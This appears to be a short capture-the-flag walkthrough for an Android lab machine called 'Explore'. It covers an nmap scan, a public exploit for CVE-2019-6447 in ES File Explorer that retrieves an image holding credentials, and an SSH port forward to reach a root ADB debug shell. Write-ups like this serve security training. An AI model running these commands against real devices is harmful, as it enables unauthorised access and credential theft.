Explore
Personal Rating: Easy
Enumeration
Starting with an nmap scan, some very interesting results can be seen:
sudo nmap -Pn -sV -p- 10.10.10.247PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
43705/tcp open unknown
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or olderhttp://10.10.10.247:59777/ #Forbidden: No dirlisting
ES File Explorer Exploit
The machine seems to be an Android device. Further investigating the ES File explorer turns out to be promising. I found an exploit script on exploitdb:
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
python3 ES-File-exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
The shell was executed as 'u0_a76', but the image contained the credentials for the user kristi.
ADB Debug Shell
For the root I had some help from a friend who is more proficient in android hacking.
I started an ssh shell from my machine and used adb to start a debug shell:
ssh kristi@<TARGETIP> -p 2222 -L 5555:localhost:5555
adb devices
emulator-5554 device
adb shellThe debug shell was running with root permissions.
This is unusual 'in the wild' as adb debugging would have to be activated on the device, which is uncommon and not default.
Last updated